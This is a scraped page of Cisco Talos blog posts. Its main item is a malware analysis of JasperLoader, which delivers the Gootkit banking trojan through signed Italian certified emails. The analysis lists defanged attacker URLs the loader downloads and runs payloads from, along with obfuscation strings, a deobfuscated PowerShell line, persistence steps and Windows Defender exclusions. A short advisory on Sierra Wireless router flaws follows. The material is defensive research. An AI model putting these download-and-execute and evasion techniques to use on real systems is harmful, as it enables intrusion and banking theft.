Quantcast
Channel: Cisco Talos Blog
Viewing all 1925 articles
Browse latest View live

JasperLoader Emerges, Targets Italy with Gootkit Banking Trojan

$
0
0
Nick Biasini and Edmund Brumaghin authored this blog post with contributions from Andrew Williams.

Introduction to JasperLoader


Malware loaders are playing an increasingly important role in malware distribution. They give adversaries the ability to gain an initial foothold on a system and are typically used to deliver various malware payloads following successful compromise. These attacks are popping up more frequently, as we covered in July with Smoke Loader and Brushaloader earlier this year. Loaders allow attackers to decide which malware to drop based on how they feel they can best monetize the access they gained. While malware loaders are commonly seen with email-based threats, they have also been prevalent within the exploit kit landscape for years. Recently, Cisco Talos observed an increase in loader activity being used to deliver various malware to systems located in various European countries.

Specifically, we're tracking a loader known as "JasperLoader," which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

Over the past several months, we've seen several spam campaigns with signed emails attempting to infect victims with JasperLoader and ultimately the Gootkit banking trojan. Message signing makes use of certificates' verification to confirm the authenticity of the person sending the email, as only those with access to the private keys should be able to sign the message. Message signing is not the same as message encryption and is used only to validate the identity of the message sender not to guarantee the confidentiality of the message itself. Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.

Malicious spam campaigns


As with many email-based threats, Talos observed multiple distinct campaigns being leveraged to distribute JasperLoader. Each campaign featured various email templates and downloader configurations. Each campaign was also relatively localized and featured multiple languages specific to each of the countries that were being targeted. Most of the campaign activity targeted European countries with a specific focus on Italy. However, we have identified campaigns targeting countries outside of Europe. Below is an example of an email associated with one of the campaigns targeting Germany.
Figure 1: Example email (German)

The email is fairly basic and includes an attached ZIP archive. The subject line "Zahlungserinnerung" roughly translates to "Payment Reminder," which is a theme consistent with many of the malspam campaigns commonly observed in the wild. This particular campaign leveraged a Visual Basic for Applications (VBS) script that was responsible for initiating the JasperLoader infection process. We'll dive into the obfuscated script later. The campaigns targeting Germany were some of the only ones that were observed using VBS files to initiate the JasperLoader infection. Most of the attacks generally used DOCM files to download JasperLoader, and ultimately Gootkit.

As previously mentioned, most of the JasperLoader campaign activity that has been observed over the past few months has been targeting Italy. As can be seen in the screenshot below, these emails are significantly different than those seen in the other campaigns. Rather than containing a malicious file attachment, these emails purport that they are notifications associated with the receipt of a "certified email" and contain an attached EML file.

The threat actors distributing JasperLoader are leveraging a legitimate certified email service called Posta Elettronica Certificata (PEC) to distribute these emails. This is a certified email service related to legislation recently passed in Italy involving new requirements associated with electronic invoicing that took effect at the beginning of 2019. This new legislation requires Italian businesses to use electronic invoicing to deliver invoices for both business-to-business (B2B) and business-to-consumer (B2C) transactions. Attackers have recognized that this is an attractive way to leverage an already trusted email service to maximize the likelihood that they can convince potential victims to open their malicious emails.
Figure 2: Example "Certified" email

One of the requirements associated with this new legislation is that all electronic invoicing emails must be signed and sent using a new platform called "Sistema di Interscambio (SDI)." Additionally, invoices should be sent using a specific XML-based format for consumption and that format should be verified and its validity confirmed before being transmitted to the recipient of the invoice.

As you can see, this particular campaign is leveraging this service, which allows them to transmit messages that meet the requirements associated with this new legislation and abuse the trust between potential victims and the certified email service.
Figure 3: Certificate details

The certificate itself is valid and associated with the PEC certified email service that was described above. Using the PEC certified email service, organizations are allowed to send attachments of up to 30MB to recipients. Posta Elettronica Certificata (PEC) is currently being widely used in Italy, Switzerland and Hong Kong and allows people to send registered email messages. The idea behind this project is to allow anyone — whether living in the country or not — to communicate through official channels, while allowing for the verification of the authenticity of the message sender. This service enables the communication of official business-related information without relying on physical mail services, facilitating faster real-time communications.
Figure 4: Certificate properties

The campaigns observed to be leveraging the PEC service contained emails that claim to be notifications of the receipt of a "certified email message" and featured EML attachments. The screenshot below shows what one of these EML attachments looks like when opened by potential victims.
Figure 5: Attached email message

As can be seen above, the attached EML files contain attached ZIP archives that hold Microsoft Word DOCM files that reference the same invoice as the emails to which they were attached. The DOCM files contain malicious embedded VBA macros that initiate the JasperLoader infection process. The metadata associated with the DOCM files used across many of the campaigns have been observed containing the string value "VPS2day" in several of the metadata fields.
Figure 6: ZIP attachment contents

Figure 7: Document properties

Talos identified multiple unique malicious DOCM files associated with JasperLoader campaigns taking place over the course of several weeks. An example search for files with metadata containing the string "VPS2day" resulted in 167 unique files in VirusTotal.
Figure 8: Metadata search results

In addition to the campaigns using malicious DOCM files to distribute JasperLoader, we also observed messages containing malicious JS downloaders. There were also some campaigns that featured legitimate and malicious file attachments. For example, some of the observed campaigns included ZIP files containing JS and XML files and benign PDF invoices. In several of the campaigns, some of the files were improperly named. For example, the XML files were .XM instead of .XML and the PDF invoices were .PF instead of .PDF.

Subtle changes like this can be surprisingly effective when attempting to convince potential victims to open file attachments. Talos also observed campaigns that leveraged PDF attachments that contained no file extension whatsoever. Investigating the PEC certified email service, we identified that this service is being widely abused by threat actors for a variety of malicious purposes dating back to the beginning of 2019 when the legislative requirements took effect.

One other interesting aspect of this campaign was its utilization of Domain Shadowing, a technique Cisco Talos discovered, which was pioneered by exploit kit users back in 2015. This technique allows the adversary to host malicious content on subdomains associated with legitimate domains. This is typically achieved through abuse of the registrant account, allowing for the creation of subdomains pointing to adversary-owned infrastructure.

JasperLoader details


Microsoft Word documents were attached to several of these malicious emails. When opened, these documents displayed this decoy image:
Figure 9: Example of a malicious Word document

The message displayed in the image is in Italian, and translates to:

This file was created with a prior Microsoft Office 365 version. To view the contents you need to click on the "Enable modifications" button, located on the yellow bar at the top, and then click on "Enable content."

JasperLoader Stage 1


The Microsoft Word documents contain malicious macros that execute JasperLoader and start the infection process. Using the Python oletools package, we can further analyze the macro execution and determine how the infection process takes place.
Figure 10: Analysis results using oletools

As displayed in the screenshot above, oletools detects the presence of the VBA macros embedded within the Word document. The macro is configured to execute when the Word document is opened and is responsible for executing the commands to initiate the infection. The presence of "Chr" within the VBA macros may indicate that the macros have been obfuscated, which we will walk through to provide an example of the process analysts can take to analyze these types of malware loaders.

In addition to the use of Microsoft Word documents, Talos also observed the use of ZIP archives that directly contain VBS downloaders. The infection process is the same in both cases. While the obfuscation differs slightly between the two types of campaigns, the approach is very similar. We will walk through the infection process using the VBS with the following hash (SHA256): dc78dbd42216fdb64c1e40c6f7a2fad92921f70c40446d62eb1873d6b77ee04c.

As previously reported by oletools, the macros have been obfuscated to make static analysis more difficult. The macros define a variable and then an array containing a large number of elements.
Figure 11: Obfuscated VBScript array

At the end of the script, the following code is responsible for performing a mathematical operation on all of the numbers in the array, reconstructing it into code that can be executed, and then executing it to continue the infection process:
Figure 12: VBScript array reconstruction

The value assigned to the variable d1 is 267. To identify what is actually going to be executed, we can subtract 267 from each of the numbers present in the array and convert the resulting value into the corresponding VBScript character using a conversion table similar to the one available here.

Once we have replaced the array values with the correct VBScript character value, we can see that the VBScript is responsible for executing PowerShell commands. However, there are still a lot of artifacts from the VBScript obfuscation present, which makes additional analysis difficult. Talos has observed that the value used for the subtraction changes frequently across samples, but that the logic remains the same.
Figure 13: Converted VBScript character values

The next step is to remove all of the unnecessary characters that were part of the VBScript obfuscation to recreate the VBScript, as well as the PowerShell associated with this stage of the infection. Once we have removed these extra characters, we are left with the following partially obfuscated code:
Figure 14: Partially obfuscated script

Several string values have been inserted into the PowerShell that the VBScript will execute in order to avoid string-based detection and make much of the PowerShell unreadable. A closer look at the portion of the PowerShell instructions that haven't been obfuscated show that during the execution process, -replace will be used to remove these extra string values to allow for the reconstruction of the obfuscated Powershell. Examples of this operation can be seen in the below syntax:

-replace '6ayBRVW',"";
-replace 'uVRWRut',"";
-replace '6xzQCRv',"";

This code instructs the system to replace these three string values throughout the script with nothing, effectively removing them and allowing the Powershell code to properly execute. Manually removing all references to these three strings results in the following:
Figure 15: Deobfuscated Stage 1 Powershell

This script performs the following operations:
  • Calls WScript and uses it to execute PowerShell.
  • PowerShell is used to invoke the Get-UICulture cmdlet to identify the language set used on the system.
  • If the language set is associated with one of the following countries, the infection process terminates:
    • Russia
    • Ukraine
    • Belarus
    • The People's Republic of China
  • Downloads additional data from the following URLs:
    • hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=
    • hxxps://www[.]telekom[.]de/resources/images/130468/eSS-illustrations-V006-MeineErsteRechnung-FN-SG.png
    • hxxp://cloud[.]diminishedvaluecalifornia[.]com/501?dwgvhgc
  • The data downloaded from the aforementioned URLs is saved to the following file location, respectively:
    • %TEMP%\SearchIE32.js
    • %TEMP%\illustrations5543.png
    • %TEMP%\AdobeAR.exe
  • Executes the downloaded files, continuing the infection process.

The infection process then continues with the execution of the contents that were retrieved from the attacker's distribution servers.

JasperLoader Stage 2


As previously mentioned, the PowerShell executed in Stage 1 is responsible for reaching out to three distinct URLs used to retrieve and execute content on infected systems. The first URL that is defined is: hxxp://cloud[.]diminishedvaluecalifornia[.]com/501?dwgvhgc.

The malware loader initiates an HTTP GET request for contents hosted at the aforementioned URL and returns a numerical value from the attacker-controlled server. Note that the code is present within the Content Body of the HTTP Server Response:
Figure 16: Example HTTP GET request

As defined by the Powershell instructions in Stage 1, the returned content is then saved to %TEMP%\AdobeAR.exe.

In addition to the value "500" that is returned to the client, Talos has also observed additional codes being returned such as "404," "408," etc. In all of the cases Talos observed, the HTTP Response Code remains 200 OK, but the code present in the Content Body varies.

The malware loader also reaches out to the attacker's server at hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=.

Following an HTTP GET request by the malware loader, the malicious server responds by sending back an HTTP response that contains obfuscated JavaScript:
Figure 17: Stage 2 obfuscated JavaScript

As defined in Stage 1, the contents of the returned JavaScript are saved to the %TEMP%\SearchIE32.js and executed. The contents have been obfuscated to make analysis more difficult. Similar to what was seen with the VBScript obfuscation in the previous stage of the infection, the code defines an array, and then uses push() to create the string of obfuscated data. JavaScript code at the end of the returned content is responsible for reassembling, deobfuscating, and then using eval() to execute the JavaScript.
Figure 18: JavaScript execution functionality

The good news with JavaScript obfuscation is that, typically, the code deobfuscates itself prior to execution. Rather than attempt to manually deobfuscate the JavaScript, we can rely on this behavior to have the code deobfuscate itself automatically. In order to more efficiently deobfuscate and analyze the malicious JavaScript, we can use an analysis tool like Malzilla.
Figure 19: Malzilla decoder tab

Malzilla will deobfuscate the JavaScript and display it in the lower pane. In the case of JasperLoader, this results in another script containing a partially obfuscated set of PowerShell instructions that defines how the malware will continue the infection process.
Figure 20: Malzilla output

The returned script is partially obfuscated using the same method we encountered previously. As we saw before, we simply need to remove the junk strings included throughout the script to fully deobfuscate it. Once those strings are removed, we are left with a script that looks similar to what we saw earlier, with a few changes included:
Figure 21: Stage 2 PowerShell deobfuscated

This script is responsible for performing the retrieval of the commands associated with the next stage of the infection process. It performs the following actions:
  • Calls WScript and uses it to execute PowerShell.
  • PowerShell is used to invoke the Get-UICulture cmdlet to identify the language set used on the system.
    • If the language set is associated with one of the following countries, the infection process terminates:
      • Russia
      • Ukraine
      • Belarus
      • The People's Republic of China
  • Downloads additional data from: hxxp://cdn[.]zaczvk[.]pl/crypt0DD1D2637FDB71097213D70B94E86930.php
    • Saves the downloaded contents to %TEMP%\SearchIE32.txt
    • Reads the contents of the downloaded file and performs a Regex based replacement to deobfuscate it.
    • Executes the deobfuscated code to continue the infection process.
In addition to retrieving the data required to continue the infection process, the script also implements a Sleep cmdlet for 180 seconds then attempts to retrieve the latest obfuscated JavaScript that is hosted at the same URL that was referenced in Stage 1.
Figure 22: Stage 2 — JavaScript retrieval

This JavaScript is then executed again. This is a mechanism that can be used to ensure that as the attackers modify the infection process, they can ensure that any previously infected systems automatically retrieve the modifications and are updated accordingly. This demonstrates an approach that ensures that this loader can be used repeatedly, potentially to deliver different malware payloads over time.

As previously mentioned, the malware makes an HTTP GET request to the following URL to obtain additional instructions from the attacker-controlled server: hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php.
Figure 23: Stage 3 retrieval

The obfuscated data that is returned by the server is then saved to %TEMP%\SearchIE32.txt. The script then reads back the contents of this file and performs a regex replacement operation to deobfuscate it so that it can be executed:
Figure 24: Stage 3 deobfuscation instructions

In order to further analyze the infection process, we need to deobfuscate the contents that were retrieved by the PowerShell. One way is to manually perform the same operation as the PowerShell.

In the previous screenshot, the following line of PowerShell is responsible for deobfuscating the code that was previously retrieved and adding it to the end of a variable assignment, which is later executed:
Figure 25: Stage 3 deobfuscation regex

As the SearchIE32.txt file is read back in, the -replace statement is responsible for removing two of every three characters from the file to deobfuscate and reconstruct the PowerShell commands to be executed. The operation looks like this:

The obfuscated code contains a lot of junk code:

0zig7fs9(y4 7b(i6G7aet5tvf-giUdtIacC4zuxelactd7u6wr53ehy)26.izNejahgm71ewf ga-99mefau6twyctvhu6 6w'cxRf7Ua5|5aUuzAxi|4uBv6Yez|7eCd7N13'v3)66{v4 81eigxjyitct83;3e z4}e0

For every three characters present in the obfuscated code, the first two characters are removed and the remaining character is added to the end of the variable $jwihbyjzvhwwziwzadiuxat

For example, the string:
0zig7fs9(y4 7b(i6G7aet5tvf-giUdtIacC4zuxelactd7u6wr53ehy)26.izNejahgm71ewf ga-99mefau6twyctvhu6 6w'cxRf7Ua5|5aUuzAxi|4uBv6Yez|7eCd7N13'v3)66{v4 81eigxjyitct83;3e z4}e0 
Becomes the PowerShell command:
if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } 

In order to more efficiently deobfuscate the next stage of instructions, we will leverage the PowerShell ISE console to unpack the code for us. We can do this by copying the data retrieved from the server to our system and modifying the same PowerShell commands specified in the aforementioned script:
Figure 26: PowerShell ISE Input

Now that the variable $jwihbyjzvhwwziwzadiuxat contains the deobfuscated code, we can simply retrieve the current value stored in this variable:
Figure 27: Using PowerShell ISE to retrieve code

This causes the PowerShell ISE console to provide the deobfuscated commands that will be used for the next series of operations. We can now retrieve this information and continue our analysis.
Figure 28: PowerShell ISE Stage 3 output

JasperLoader Stage 3


Now that we have obtained the PowerShell responsible for the next stage of the infection process, we can begin to observe the main characteristics of the malware loader itself. Below is the Powershell code associated with this stage of operations.
Figure 29: Stage 3 deobfuscated PowerShell

As can be seen in the screenshot above, this is where the majority of the activity associated with JasperLoader takes place. The PowerShell present in this stage is responsible for the operations described in the following sections.

Geolocation checks


The PowerShell associated with Stage 3 of the JasperLoader infection process performs exactly the same geolocational verification that we have observed in all previous stages of the infection. It checks the UICulture of the system and terminates execution if the UICulture matches Russia, Ukraine, Belarus, or People's Republic of China.
Figure 30: Stage 3 geolocation check

Achieving persistence


The next series of actions are associated with maintaining access to the system. A function called CreateShortcut() is defined that is responsible for achieving persistence by creating a LNK shortcut in the Startup folder of the infected system to ensure that the malware will execute when the system reboots.
Figure 31: Stage 3 persistence mechanism

Bot ID generation


The malware also queries the system using WMI and retrieves various pieces of information that are used to generate a unique identifier for the infected system. This information is later transmitted to the C2 server to register the newly infected system and allow for it to be uniquely identified. These activities are performed by the CreateID() function that is defined, as shown below:
Figure 32: Stage 3 BotID generation

Bot registration and command retrieval


The infected system then uses an HTTP GET request to beacon out to the command and control (C2) server and transmits the unique bot identifier to register the new bot. It also waits for a response from the C2 server to determine how to proceed:
Figure 33: Stage 3 C2 registration

As can be seen in the observed screenshot, the C2 server issues HTTP responses that include pipe-delimited parameters that provide additional commands to JasperLoader and direct it how to proceed.

Supported commands:


JasperLoader currently has support for three distinct commands that may be received from the C2 server during this operation. They are denoted by the first character that is present in the response received from the C2 server. (Such as the letter "d" in the previous screenshot.)

Update mechanism ("u")


The "u" command may be received from the C2 server and directs JasperLoader to attempt to attempt to update itself using the parameters received from the C2 which are handled as values in an array assigned to the variable $action.
Figure 34: Stage 3 update mechanism

Bot management mechanism ("m")


The "m" command provides a mechanism with which the attacker can execute arbitrary system commands using Powershell on infected systems. The loader waits for a response from the C2 server that contains pipe-delimited information. It retrieves PowerShell commands from C2 and passes them to the Invoke-Expression (IEX) PowerShell cmdlet so that they can be executed.
Figure 35: Stage 3 bot management

Download mechanism ("d")


The "d" command directs the infected system to retrieve the final malware payload and provides the parameters with which this operation should take place. It informs JasperLoader where to go to retrieve the final malware payload, where to save it, and where to send status updates following successful deployment of the final payload.
Figure 36: Stage 3 download Function I

Figure 37: Stage 3 download Function II

It also creates a Windows Defender AV exclusion for the directory in which the PE32 will be stored if the system is running PowerShell version 4 or higher.
Figure 38: Stage 3 Windows defender exclusion

The system then attempts to retrieve the PE32 file that is the malicious payload in this particular infection. The screenshot below shows the C2 server delivering the malicious PE32 file to the infected system.
Figure 39: Stage 3 payload delivery

The status of the successful deployment of the malware payload is then further communicated to the attacker's server.
Figure 40: Post-infection status update

In this particular case, the malicious payload being delivered by JasperLoader is a widely distributed banking trojan called "Gootkit." This malware mainly looks to steal users' information and can act as a backdoor to the compromised machine.

Conclusion


JasperLoader is a malware loader that features a multi-stage infection process. This process has been constructed in a way that makes the loader resilient and provides flexibility to adversaries that are attempting to leverage it to spread malware. While it is currently being used to spread the Gootkit banking trojan, it will likely be used to distribute additional malware payloads in the future, as it has been designed in a way that allows the operators of the loader's infrastructure to use it for new payloads in the future as they choose to monetize their operation in different ways. The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks. In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. In addition to the various threats that we have already observed abusing these services, we expect additional threats to begin leveraging them as well.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Indicators of compromise


The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of JasperLoader activity.

Attachment hashes (SHA256)


A list of hashes observed to be associated with malicious email attachments can be found here.

Domains


A list of domains observed to be associated with JasperLoader can be found here.

IP addresses


A list of IP addresses observed to be associated with JasperLoader can be found here.


Threat Source (April 25)

$
0
0

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

If you haven’t yet, there’s still time to register for this year’s Talos Threat Research Summit— our second annual conference by defenders, for defenders. This year’s Summit will take place on June 9 in San Diego — the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register!

Weeks after our initial DNSpionage post, we published an update on the malware, including outlining new malware the actors are distributing and a growth in the number of targets.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Location: Salt Lake City, Utah
Date: April 25
Speaker: Nick Biasini
Synopsis: Join Nick Biasini as he takes part in a day-long education event on all things Cisco. Nick will be specifically highlighting the work that Talos does as one part of the many breakout sessions offered at Cisco Connect. This session will cover a brief overview of what Talos does and how we operate. Additionally, he'll discuss the threats that are top-of-mind for our researchers and the trends that you, as defenders, should be most concerned about.  

Cyber Security Week in Review

  • Facebook says it may have accidentally uploaded more than 1.5 million users’ emails without their permission. However, the contact information was not shared with anyone outside of Facebook, according to company officials, and all the email addresses have been deleted.
  • The source code for the Carbank backdoor has appeared on VirusTotal alongside builders and other code from the group behind the malware. The group behind Carbank launched the malware against an estimated 100 U.S. companies.
  • The U.S. says a cyber attack on Japan could count as an act of war under a mutual protection agreement between the two countries. A defense leader from Japan called it “significant from the perspective of deterrence.”
  • Leaders from Singapore say they will not be deterred from modernizing despite a recent wave of data breaches. The country, which prides itself on incorporating technology into its government services, recently had data leaks of several federal databases, including a list of HIV patients.
  • A recent study found that the password “123456” was the most popular password among users who had their accounts hacked last year. The second most popular string was “123456789.”
  • The Weather Channel was taken off-air for more than an hour last week due to a ransomware attack. The FBI launched an investigation into the attack.
  • A well-known security researcher pled guilty to charges of creating malware between 2012 and 2015. Known as MalwareTech online, the man helped bring down the WannaCry ransomware attack in 2017.

Notable recent security issues

Title: Sea Turtle campaign highlights dangers of DNS hijacking
Description: Cisco Talos discovered a new cyber threat campaign called "Sea Turtle," which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. The investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. Talos assesses with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems.
Snort SIDs: 2281, 31975 - 31978, 31985, 32038, 32039, 32041 - 32043, 32069, 32335, 32336, 41909, 41910, 43424 - 43432, 44531, 46897, 46316

Title: Cisco discloses 31 vulnerabilities, including some critical
Description: Cisco released advisories for 31 vulnerabilities last week, including “critical” patches for its IOS and IOS XE Software Clusterm management and IOS software for the Cisco ASR 9000 series of routers. Other vulnerabiliites also deal with Cisco Wireless LAN Controllers. If unpatched, an attacker could exploit these vulnerabilities to carry out denial-of-service attacks or gain the ability to remotely execute code.
Snort SIDs: 49858, 49859, 49866, 49867, 49879

Most prevalent malware files this week

SHA 256:3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256:8f236ac211c340f43568e545f40c31b5feed78bdf178f13abe498a1f24557d56
MD5: 4cf6cc9fafde5d516be35f73615d3f00
Typical Filename: max.exe
Claimed Product:易语言程序
Detection Name: Win.Dropper.Armadillo::1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256:15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 799b30f47060ca05d80ece53866e01cc.vir
Claimed Product: N/A
Detection Name: W32.Generic:Gen.21ij.1201

SHA 256:46bc86cff88521671e70edbbadbc17590305c8f91169f777635e8f529ac21044
MD5: b89b37a90d0a080c34bbba0d53bd66df
Typical Filename: u.exe
Claimed Product: Orgs ps
Detection Name: W32.GenericKD:Trojangen.22ek.1201

Vulnerability Spotlight: Multiple vulnerabilities in Sierra Wireless AirLink ES450

$
0
0


Carl Hurd and Jared Rittle of Cisco Talos discovered these vulnerabilities.

Executive summary

Several exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems. These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator’s password and expose user credentials, among other scenarios. The majority of these vulnerabilities exist in ACEManager, the web server included with the ES450. ACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Sierra Wireless to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Sierra Wireless AirLink ES450 ACEManager iplogging.cgi command injection vulnerability (TALOS-2018-0746/CVE-2018-4061)

An exploitable command injection vulnerability exists in the ACEManager iplogging.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can inject arbitrary commands, resulting in arbitrary command execution. An attacker can send an authenticated HTTP request to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 SNMPD hard-coded credentials vulnerability (TALOS-2018-0747/CVE-2018-4062)

A hard-coded credentials vulnerability exists in the SNMPD function of the Sierra Wireless AirLink ES450 FW 4.9.3. Activating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user. An attacker can activate SNMPD without any configuration changes to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager upload.cgi remote code execution vulnerability (TALOS-2018-0748/CVE-2018-4063)

An exploitable remote code execution vulnerability exists in the upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the web server. An attacker can make an authenticated HTTP request to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager upload.cgi unverified password change vulnerability (TALOS-2018-0749/CVE-2018-4064)

An exploitable unverified password change vulnerability exists in the ACEManager upload.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an unverified device configuration change, resulting in an unverified change of the `user` password on the device. An attacker can make an authenticated HTTP request to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager ping_result.cgi cross-site scripting vulnerability (TALOS-2018-0750/CVE-2018-4065)

An exploitable cross-site scripting vulnerability exists in the ACEManager ping_result.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP ping request can cause reflected JavaScript to be executed and run on the victim's browser. An attacker can exploit this by convincing a victim to click a link or embedded URL that redirects to the reflected cross-site scripting vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager cross-site request forgery vulnerability (TALOS-2018-0751/CVE-2018-4066)

An exploitable cross-site request forgery vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an authenticated user to perform privileged requests unknowingly, resulting in unauthenticated requests being requested through an authenticated user. Triggering this vulnerability may allow an attacker to get authenticated pages via an authenticated user.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager template_load.cgi information disclosure vulnerability (TALOS-2018-0752/CVE-2018-4067)

An exploitable information disclosure vulnerability exists in the ACEManager template_load.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information leak, resulting in the disclosure of internal paths and files. An attacker can make an authenticated HTTP request to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager information disclosure vulnerability (TALOS-2018-0753/CVE-2018-4068)

An exploitable information disclosure vulnerability exists in the ACEManager function of Sierra Wireless AirLink ES450 FW 4.9.3. An HTTP request can result in the disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager information exposure vulnerability (TALOS-2018-0754/CVE-2018-4069)

An information disclosure vulnerability exists in the ACEManager authentication functionality of Sierra Wireless AirLink ES450 FW 4.9.3. The ACEManager authentication functionality is done in plaintext XML to the web server. An attacker can listen to network traffic upstream from the device to capitalize on this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi information disclosure vulnerability (TALOS-2018-0755/CVE-2018-4070, CVE-2018-4071)

An exploitable information disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause information disclosure, resulting in the exposure of confidential information, including, but not limited to, plain text passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi permission assignment vulnerability (TALOS-2018-0756/CVE-2018-4072, CVE-2018-4073)

An exploitable permission assignment vulnerability exists in the ACEManager Embedded_Ace_Set_Task.cgi function of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an arbitrary setting to write, resulting in the unverified changes to any system setting. An attacker can make an authenticated HTTP request, or run the binary as any user, to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Versions tested

Talos tested and confirmed that that the Sierra Wireless AirLink ES450 FW 4.9.3 is affected by these vulnerabilities.

Devices affected

Sierra Wireless has confirmed that multiple devices are affected by various subsets of these vulnerabilities including:
  • GX400
  • ES/GX440
  • LS300
  • ES/GX450
  • MP70
  • RV50/50X
  • LX40/60X

More thorough information about untested devices can be found through the Sierra Wireless advisories.



Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48600, 48635, 48614 - 48621, 48747

Threat Roundup for April 19 to April 26

$
0
0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 19 and April 26. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

